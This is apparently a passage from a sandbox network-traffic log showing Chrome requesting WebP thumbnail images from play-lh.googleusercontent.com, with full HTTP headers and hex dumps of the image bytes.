                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: af c0 e2 dc 0f 04 cd 19 9c f2 19 4e e1 36 30 36 2f 99 5a 60 4b 82 44 a4 9b 15 8b fb f3 43 05 cb cf 3c 27 aa ff 0e 1e c6 2a 96 f1 10 5c 84 f1 11 3a b2 d6 37 1c af 29 43 c7 87 40 d6 22 8a ca 0e 90 03 f3 3a c5 03 4a 7b 5e 9f fc 8c 0b 1a dc b0 3f 3d cb e3 e7 91 99 27 f7 ad a2 b5 87 c7 2a 70 26 f1 e3 35 cc 48 c0 33 1b 3e 5d f1 5b f8 1a 20 81 42 b8 47 12 88 41 38 10 ce 41 69 fe 9d ed 64 4f 55 92 8c c7 d1 9e 36 24 f7 54 5d c0 3e c7 32 66 f9 cd 2c 19 17 33 77 b2 b5 da cb 5b 49 19 c6 75 59 46 5e 3f 54 f4 dd 10 e5 55 bb 50 85 37 0c 06 8c ee b5 d6 0e 79 0e 60 72 b6 07 61 93 07 93 9f 48 81 2e 73 88 89 92 6e a9 33 be 48 5b 74 e0 50 b5 c7 12 94 81 ae 0a 55 28 41 16 fc 90 90 a4 34 27 0f d9 b2 18 02 62 90 56 a9 50 b4 f4 95 bd 64 9a 40 4e 28 86 11 29 6f 4b e9 cc 6e 46 82
                                                                                                                                                                                                                                  Data Ascii: N606/Z`KDC<'*\:7)C@":J{^?='*p&5H3>][ BGA8AidOU6$T]>2f,3w[IuYF^?TUP7y`raH.sn3H[tPU(A4'bVPd@N()oKnF


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  127192.168.2.649979216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1093OUTGET /LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 11894
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5844
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC856INData Raw: 52 49 46 46 6e 2e 00 00 57 45 42 50 56 50 38 20 62 2e 00 00 b0 9e 00 9d 01 2a a6 00 28 01 3e 61 28 90 45 24 22 a1 97 1b 2e 4c 40 06 04 b5 04 38 00 f8 00 cd 77 35 ff 1b f8 e5 dc 61 d9 3c 3f e4 6f b4 af 20 f6 27 eb 2f ba 7e a7 fe db f3 c5 fb 9e e5 3e 5b c8 9b 9c bf e3 7f 88 fe ed fb 25 f3 33 fd 17 fc 4f 66 5f a2 bf ea 7b 81 fe a5 ff bb fe df f9 01 dd 67 f7 4b d4 57 f4 af ee 9f fa 7f c9 7b c5 7f d0 fd c0 f7 59 fd fb d4 03 fa d7 fb 2f ff fe d5 3f ef ff ff fb 98 ff 77 ff 7b ff d3 dc 03 f9 97 fb 2f 4d af dc cf 84 8f ed ff f1 7f 71 3e 06 7f 67 ff f9 fb 00 7f f4 f5 00 e9 f7 eb df f6 5f 46 fe 18 fe 37 f2 8f ce df 2a 5e f1 fd eb f6 eb d8 ff 21 7c 61 fa 11 fc e3 f0 b7 e9 3f c2 fe e3 fb 5d ff 13 c4 bf 9c bf eb fa 85 fe 5b fc e3 fd 1f e6 b7 f7 7f 8e df be ee 67 b8 5f
                                                                                                                                                                                                                                  Data Ascii: RIFFn.WEBPVP8 b.*(>a(E$".L@8w5a<?o '/~>[%3Of_{gKW{Y/?w{/Mq>g_F7*^!|a?][g_
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: a1 7f 7c cf 63 f1 17 a5 2c ae 95 ab e2 c5 d1 d4 e2 3e db 7f 63 93 d4 8b d8 77 c8 43 08 e4 ca 79 c1 39 26 c1 2f dd 22 f9 eb 5c 30 3d 71 5e 58 3f 73 4e 60 23 e3 d9 fc 58 d4 87 9d c3 16 a8 eb c5 15 9d 47 09 80 d2 d7 a4 9b 80 ec 3e 6b f4 39 93 1d b3 eb 0e be c3 94 a9 40 f5 3c 86 3b f6 34 ca 72 24 52 b3 31 5b 9e 26 13 9c 7e 62 8e 39 2e 94 41 b0 eb c1 7f 7a a7 2d f1 dc a6 c0 40 94 fe 69 03 ca d9 25 fc 6f 91 27 60 86 8d 66 3b e0 b7 ce 67 14 1c 3b eb 8b eb eb 0e 1a ef ad b1 9f 80 71 73 3f 88 83 ae 00 54 6b c4 b4 a1 5b 53 27 24 d9 c9 5b 28 d6 9d 67 e7 84 b4 8c 4f e1 96 67 c2 bf 93 0f c8 0c 7f d3 d9 28 1a 24 60 09 4b a0 c6 e8 af 33 a5 87 5b be ac 48 a7 b5 11 c5 97 c3 d6 d7 33 3f da db bf ae cb de 7b 0d c5 f9 90 9e 85 64 17 53 ef 8a af fd 87 75 b0 5b 0e c4 1b 6e 5e
                                                                                                                                                                                                                                  Data Ascii: |c,>cwCy9&/"\0=q^X?sN`#XG>k9@<;4r$R1[&~b9.Az-@i%o'`f;g;qs?Tk[S'$[(gOg($`K3[H3?{dSu[n^
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: b5 54 4a 66 f8 01 79 35 79 c4 bc 82 80 28 c2 92 11 cf 0a 76 49 d6 0d 30 44 9e 59 9f ec fa ec c5 7a a6 48 bb aa 09 2f 8e e7 e2 32 9e 9a 2c 10 45 fd 35 f2 55 89 93 0f 0c fe 85 71 0a 0f 83 1a c3 e9 76 b0 67 63 6d ac 3a 4f ad 6e 2b 63 04 11 6f 96 96 3e 9e 28 16 60 4d 4f 76 c6 89 64 05 6f 03 d7 d2 92 d8 60 82 81 f8 ce 55 de f0 79 2c 62 20 84 9f 61 90 78 d0 d6 3e c3 42 99 f2 cf 06 72 80 0b 1a c4 29 ab 3b ee 39 6a 2f ae 5a 89 dc 6e 61 ef af f1 5d 47 75 51 73 e6 1e a5 ea 77 d6 66 5b ca 36 82 bf 9c 3f f1 9e e6 1a 88 f0 ab 32 08 6c 44 5e 23 b7 e4 7b 2b 98 0f 11 ea 62 ee 56 62 44 43 19 61 f5 52 58 1e 6a a6 0f 77 25 94 4f de 9d 00 7e 33 7e 9e 71 3b 49 88 59 c4 a2 ab 4e 13 16 a6 9b 55 b2 34 bb c5 c7 4f 24 ca 79 a2 90 c5 6a 57 e0 07 e8 fe 4c 78 21 52 10 fd 1e f7 b8 d1
                                                                                                                                                                                                                                  Data Ascii: TJfy5y(vI0DYzH/2,E5Uqvgcm:On+co>(`MOvdo`Uy,b ax>Br);9j/Zna]GuQswf[6?2lD^#{+bVbDCaRXjw%O~3~q;IYNU4O$yjWLx!R
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 54 52 ea 62 1a 46 87 45 ad 03 88 02 1e b5 fd 37 b5 53 43 9b 87 d4 00 36 89 0c 14 a3 bc b3 bd 5a 6b 5e 31 58 a2 c5 c1 f7 03 a3 ff f2 28 65 c3 b1 e3 34 29 b0 33 b9 f1 15 f7 dc 36 dd ba 91 b4 f2 44 05 73 79 af 43 b7 81 b0 5e 38 30 73 a1 35 44 f3 2c c5 ad 9b 0e ce af 66 99 7c f6 01 40 44 44 d5 8b ae 71 17 6f 83 8d bf 0b 34 9b 05 db 0c 58 e1 86 4e dd ca 80 5f f3 9b 50 db d4 c9 0d 8c 02 0a 9d 55 49 54 82 c5 66 c4 e6 87 1a b5 78 07 a5 21 f6 e7 40 ab 6d ff e5 41 af 98 81 cd bf 10 b4 10 e1 ec 7b 8d f0 09 0f 48 c2 c0 2f 2d 4e b2 4e 85 63 e3 f8 c2 e0 10 64 17 f1 2c ff 01 43 90 d5 f2 3d 4f d2 df a7 9a 0c 7a 1e 8b 8a 89 94 a9 e8 cb 68 f2 5b 66 18 dd ee 70 cb fc 1b c4 b0 63 11 74 a1 f7 29 b8 63 df 0c 41 24 e6 27 46 17 ec 56 1f 5a 3b 01 4b 1c 4a e6 d5 60 bc 6b 2e ac 48
                                                                                                                                                                                                                                  Data Ascii: TRbFE7SC6Zk^1X(e4)36DsyC^80s5D,f|@DDqo4XN_PUITfx!@mA{H/-NNcd,C=Ozh[fpct)cA$'FVZ;KJ`k.H
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 98 f4 49 d7 0c ce fa e0 41 ba f4 12 bf 58 7a 87 85 73 9f 77 63 28 e7 84 16 b3 c5 02 b7 4f 88 ce e2 c0 7e b2 f7 9d e3 27 0a f6 49 99 c5 2d f4 43 d6 d5 84 b7 45 fe 11 0c 24 1d e0 63 f2 db a5 78 c9 44 e3 85 76 ab 79 b8 3a ac cc f6 2f 50 9c 22 b0 24 1b 0c a5 61 20 03 13 20 45 ee a3 b8 6b f4 cf df 00 9c 82 6b 87 3d ae 80 b5 52 b7 b0 1f d8 78 35 57 b8 2a c3 b4 95 bb de 7c 8c 01 ed cb 82 66 2e a9 02 14 ff 13 8c d3 98 be 23 88 4d e0 13 28 14 8e c7 bc dd be be 79 e4 30 56 04 f1 5c 1f a8 71 e3 06 7a cf e3 a9 f8 cc 7a a2 81 dd 05 25 fd cf c5 7e ce a8 6c 6e 5b 1e ae 84 29 00 29 ff 98 24 25 89 0c 73 7e 97 a8 b8 7e ba 5d 6f 46 d6 a7 91 b8 3c 0d 8d e8 9a 48 0c b4 10 d5 a0 d9 d8 3b 34 e1 f2 40 d9 93 ee 66 ef 93 40 09 af 52 fb dd 15 86 df 09 11 ad 57 c6 c6 7c 72 07 ce 18
                                                                                                                                                                                                                                  Data Ascii: IAXzswc(O~'I-CE$cxDvy:/P"$a Ekk=Rx5W*|f.#M(y0V\qzz%~ln[))$%s~~]oF<H;4@f@RW|r
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 08 83 40 8a a6 74 09 2d 3c 89 eb 1b ae 50 98 c8 c7 3c fa ce 2f 2f 2c 65 48 c5 d1 a0 a6 d4 88 2e db ba 2c 1d ec a5 95 f7 11 e1 82 bd c8 94 1a 75 90 77 50 5c f8 20 04 a0 01 55 d0 bc 6e 65 18 92 03 7e 39 60 9b 47 61 bc 02 22 ff 33 c8 da 71 b1 e0 e0 bb a1 82 fd de 75 43 b4 ab 1c 93 2d fc c0 09 76 49 19 76 c9 1a 3f f7 e9 fe cd e2 99 a8 e8 5a 54 a8 57 55 cc 17 46 14 75 a0 d5 5e 69 e5 3e 82 b0 c9 bc 0f 11 41 93 be f3 f0 4c 6d d0 6d 47 e0 88 2c 2f c0 8e ad f7 e0 83 cf 1f 62 37 b1 dd 50 47 2b a5 81 dc 60 25 3b 07 e7 58 6c a8 07 b7 8e 56 fa c6 02 f2 df e7 7d b9 5b 5c 9b 44 99 b3 a3 47 09 ce 77 ad e7 61 28 b3 d4 ea fc db ea 10 63 90 32 3e 9e 52 e2 80 73 bc d3 dc b1 37 0e ed 8a f7 2c f0 d5 a9 f5 16 83 d8 da 22 3c 7b 59 be 41 be 8a 11 58 30 64 ed 4d 8c 96 d9 c9 64 b9
                                                                                                                                                                                                                                  Data Ascii: @t-<P<//,eH.,uwP\ Une~9`Ga"3quC-vIv?ZTWUFu^i>ALmmG,/b7PG+`%;XlV}[\DGwa(c2>Rs7,"<{YAX0dMd
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 16 04 c2 55 98 29 7c 2c 8d 45 7a 81 99 9f ac b9 ca 48 42 80 54 99 07 ef 85 03 f7 d1 fb 4e 0e 6f 28 ee 23 68 2b b3 d7 ef 76 e7 05 69 2f eb 5d 59 82 4e 71 2a 97 c2 70 1d f3 53 8e bf 0c ea e2 d3 38 e6 9f df dc e5 c0 22 f1 d0 af 01 dc e9 03 bf fc 38 72 51 4f a0 e6 33 24 57 13 af bd 86 52 6c 7e 5d cf b6 1b 23 35 b2 62 9a e3 bb 9b fc ab 36 47 9f 4b 2f 00 80 ec 4b 45 59 e1 24 18 a2 33 37 5a d0 60 b2 c2 5c 26 88 d8 83 24 ed 32 a4 ae 2e 17 a6 84 07 d6 c1 24 0d 0f fd 8a 3d 44 10 27 71 c2 78 74 bc 9c f4 bf d6 99 b7 33 43 81 db 5c 5f 15 af 36 78 da ff a1 20 16 57 4c 5a 13 86 ed 37 bc 04 c5 85 d4 5e ca a4 58 0c ea c5 ab f5 70 5b 83 aa e4 bd e4 54 e2 ac 35 70 dc 36 b6 ed 00 9a 04 35 27 65 b8 f5 4f bc b2 b4 09 80 4b 9e a4 9d ad 69 36 f0 61 b8 98 50 97 58 68 76 7e b9 9d
                                                                                                                                                                                                                                  Data Ascii: U)|,EzHBTNo(#h+vi/]YNq*pS8"8rQO3$WRl~]#5b6GK/KEY$37Z`\&$2.$=D'qxt3C\_6x WLZ7^Xp[T5p65'eOKi6aPXhv~
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: ff 7c 3c 91 a9 55 b3 15 cf 30 19 d1 fe 9b ad f1 2c 8b ab 2f 21 a9 0f 4f d3 46 4e a9 5f 7f 6f 9e 8f c7 32 23 d7 33 3c 0f 37 fc 3c 20 46 55 b4 86 ac 1f ed 13 d0 a7 86 3f 1a a9 e0 98 dc aa 03 d2 ac 4e ef a2 bb a0 98 f9 2d cb 23 36 74 4a 81 56 81 2b 40 60 3f f9 c3 d7 8c 3c 25 8d 4d da 07 b1 ec 07 fa e1 97 29 c1 a6 33 89 5f 7f 91 56 b9 82 44 92 53 d0 62 a0 5c 43 b0 1c d0 9a 98 5a f0 41 ca 58 77 76 7a a9 16 f3 2b c7 be 21 b0 9d 79 ad a0 a7 86 0d 7c 77 54 fb 31 33 61 06 4e cd 0f e4 37 75 bd 7f ba 64 c6 b0 17 bf ea e6 ed 32 22 c6 22 ab 29 69 70 3f 4f 47 2b 67 65 40 a6 96 52 0d b7 8c be e7 7e 77 fb e1 df ea b0 f5 80 5e f9 61 e7 34 48 e8 62 bf 67 b8 8b 56 97 61 d4 d5 09 b3 6f 0a 46 c4 db a7 8c 1b 23 23 11 15 d0 b6 b4 f9 54 9a 47 47 35 f1 6a be 23 96 b9 81 1a d6 9e
                                                                                                                                                                                                                                  Data Ascii: |<U0,/!OFN_o2#3<7< FU?N-#6tJV+@`?<%M)3_VDSb\CZAXwvz+!y|wT13aN7ud2"")ip?OG+ge@R~w^a4HbgVaoF##TGG5j#
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1308INData Raw: c0 d8 fe 7f e0 90 fe 6a 47 f5 9f ed 87 f9 0e de 85 5e cf 8a 35 44 c3 11 0d af 9d 76 3a 4f d8 25 6a 3c 72 8a 03 2b 01 91 7f 3e 3e b8 77 4a 45 16 5e 42 b2 93 03 2f 0e 51 5a 89 1a 06 78 9d 15 27 c8 f1 65 4a 5c 10 3f 92 e2 80 fd de 58 e4 07 8f a5 ab d8 b9 2e cf b4 bd 25 8f ee b9 da 1b 6c ac d8 1f 18 1c 32 c8 cd 2e bd f3 bb 6e a4 03 cf da f4 68 ed 30 9a b3 4c c5 ce f4 6d 24 93 4a 8c 14 c5 48 9f 49 e5 ab b4 e8 a9 ab e8 99 57 6c 4d b5 a5 b6 2d d7 b3 5f b1 61 6c 55 1f 39 cf 8e a9 28 a3 35 c4 e4 03 a4 a8 6f 6a 3f b9 b5 67 05 7c 2e 68 4c 3c 4e a7 ea 47 6b 89 a9 5e e0 61 62 d1 5e 46 93 28 eb c8 ec 8d 84 e8 23 2c e5 0f 2a 42 28 f6 dd 67 7d f3 29 4b 6b 72 5a e8 65 87 df fa 36 52 f0 71 72 a4 35 d0 9b 86 c5 fd b6 0d 22 4d 05 3d ea ae ec 7e 32 5f c6 6e 08 ff c4 49 c8 49
                                                                                                                                                                                                                                  Data Ascii: jG^5Dv:O%j<r+>>wJE^B/QZx'eJ\?X.%l2.nh0Lm$JHIWlM-_alU9(5oj?g|.hL<NGk^ab^F(#,*B(g})KkrZe6Rqr5"M=~2_nII


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  128192.168.2.649988142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC504OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 3814
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:05:36 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:05:36 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 6493
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC857INData Raw: 52 49 46 46 de 0e 00 00 57 45 42 50 56 50 38 4c d2 0e 00 00 2f 3f c0 0f 00 09 33 6d db 28 5d bf 85 3f e1 69 1c 22 fa 3f 01 f8 0e 40 75 15 12 d7 69 ce d6 44 03 18 2d c2 a8 78 17 8c 22 49 52 94 bb 7b 4f 66 06 ff 36 49 83 9a 48 92 a2 be 03 11 f8 57 85 84 0b 89 df 52 d0 b6 0d e3 1d fe 58 87 60 ed 7f 72 78 14 80 f1 0b c8 a6 7c 00 5c ec 48 4d b9 d5 0b 80 9d 96 56 da 9e b9 03 70 03 b2 82 87 00 7b 01 c0 e3 df 18 0a da b6 61 1c fe b0 77 30 44 c4 04 b8 8b 22 7d bd 34 b5 5b 8b 76 2b 49 92 24 e7 45 cd 62 f8 7b 4b 41 45 a8 38 15 20 f8 4d 09 a8 c0 1e 9d 01 74 47 b5 0c 1e 12 db 48 72 24 89 51 33 77 af cd 7d eb 55 4a 88 24 c9 91 24 cf 39 ae cf fb 49 a8 11 1d e1 c0 6d db 48 4a cf 1c db 3a a9 07 d8 37 f8 da b6 cd 8c b6 6d db 96 ad 92 74 ba 77 9c b6 6d db b6 ad 31 5e b6 6d
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/?3m(]?i"?@uiD-x"IR{Of6IHWRX`rx|\HMVp{aw0D"}4[v+I$Eb{KAE8 MtGHr$Q3w}UJ$$9ImHJ:7mtwm1^m
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 7c 2d ca 06 0c a9 4d 50 f6 61 35 5b 1a 6a c5 0e 53 ec 3a 03 78 87 16 40 2d 0d e1 84 7e 48 2c 20 30 f8 01 06 46 02 2e b8 f9 f2 62 3a 00 c9 50 c6 d6 9c 70 7f 9a 37 df 0d 57 66 65 c4 bc 7c 1c 3e 0e bd 84 25 93 65 19 fe da f1 9b f7 bc a3 f7 7c 03 90 a6 f8 bc 05 e8 d1 32 70 06 18 3f 8c 49 9e ca 9a 7f ac 08 40 86 09 7f ce 1f 93 4f be e9 b9 33 57 a2 1c 11 01 69 79 39 7c 84 21 c3 05 04 07 70 64 84 3b 27 4f e2 46 40 05 d6 56 40 83 6e dc cb 08 7e 31 af 25 e0 2d af f8 5d 51 3a e0 f1 b7 e9 1f 57 e2 4a 5c 99 ca 08 88 48 91 68 47 4c 70 9f b2 94 1f ce 52 20 00 88 29 5e b5 9e cd 08 43 88 c5 4f e3 93 8c 21 fe c6 5f 08 07 a0 32 76 cf 3f 33 ff b8 a2 30 ca 40 04 a0 85 1d 61 0b 40 7c d5 fc f6 a2 d3 fc 35 e5 ed f5 39 b4 91 9e 7d 3d 51 8e 01 85 f0 86 e7 5c 34 7d f9 a1 8f cf e7
                                                                                                                                                                                                                                  Data Ascii: |-MPa5[jS:x@-~H, 0F.b:Pp7Wfe|>%e|2p?I@O3Wiy9|!pd;'OF@V@n~1%-]Q:WJ\HhGLpR )^CO!_2v?30@a@|59}=Q\4}
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC1390INData Raw: 8b 7e a1 78 da e3 20 a0 54 7c a1 bf 89 d5 b6 93 b7 91 56 a5 91 54 8a 9e 62 c6 7f 1f 7d dd 4a 13 00 1c 7d b6 84 22 e9 34 3c 2f 21 41 70 18 04 7a 2a 51 f3 8a 07 b4 bc c5 02 8d 4c a3 34 a5 30 38 c1 5f 9e 5e 3e fe 5f 15 02 00 c3 fa fa 25 da 81 58 cb cb e2 8a e4 f9 14 0d 0f c0 bf df fa 9c c5 a6 59 11 18 4d e8 59 b5 2f 8a a4 d3 71 b3 a1 c4 11 80 c0 d0 a4 e6 86 99 1c 64 24 c3 04 ad 04 24 47 3b 61 68 d6 60 0c 23 8c 31 3a dc 2f 3e b9 c2 b3 5f 65 13 01 e9 f0 b3 2e fe f2 2b ff dc 64 82 be 88 36 4a a8 f1 e7 47 5f 2f b2 69 de c4 4a 09 ca e1 c3 2b 61 41 d4 ed 4d 69 07 02 50 e2 db 9a f6 a2 e7 0e 01 20 60 06 9f 1e 48 05 db 1e 43 18 8c 03 08 f3 f6 d4 3e a7 ca 1f 3d 7e f4 11 90 08 e7 ed 5d 9f d8 1f be 68 f6 db 05 81 df db db 5f 90 3d cf 77 22 4d b3 62 a5 04 15 7e d4 e9 45
                                                                                                                                                                                                                                  Data Ascii: ~x T|VTb}J}"4</!Apz*QL408_^>_%XYMY/qd$$G;ah`#1:/>_e.+d6JG_/iJ+aAMiP `HC>=~]h_=w"Mb~E
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC177INData Raw: f0 f4 02 77 29 90 51 0e 5c 8c 27 bc d5 17 04 18 37 1d 8a 40 06 68 80 19 3c c5 09 fc a2 98 80 8a 26 18 14 7e 33 bd 0d 68 0a 0c 6d e4 17 80 06 a5 01 02 8e 0a 8c 39 24 64 81 0f 26 a0 17 b6 34 2f 64 17 c5 cd 36 a9 3f f6 c5 61 dc d2 8c 04 80 49 08 41 09 39 80 12 2d e6 3c 9e f0 62 20 9c 29 25 73 14 28 70 4f 06 cd c5 48 e2 2d 19 03 4c 63 0a 28 c0 a8 40 c1 27 14 00 04 2f de 44 cc f2 be 7a 6e fb 66 56 34 13 10 46 05 23 10 90 8d 01 a3 80 0a 1d e6 1c 48 17 c3 fa ee c0 8b b9 0c 36 e4 b6 b9 68 6e 21 77 74 a8 50 c2 e0 06 a3 92 cf a8 e3 40
                                                                                                                                                                                                                                  Data Ascii: w)Q\'7@h<&~3hm9$d&4/d6?aIA9-<b )%s(pOH-Lc(@'/DznfV4F#H6hn!wtP@


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  129192.168.2.649992142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC511OUTGET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:49 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 10246
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5846
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
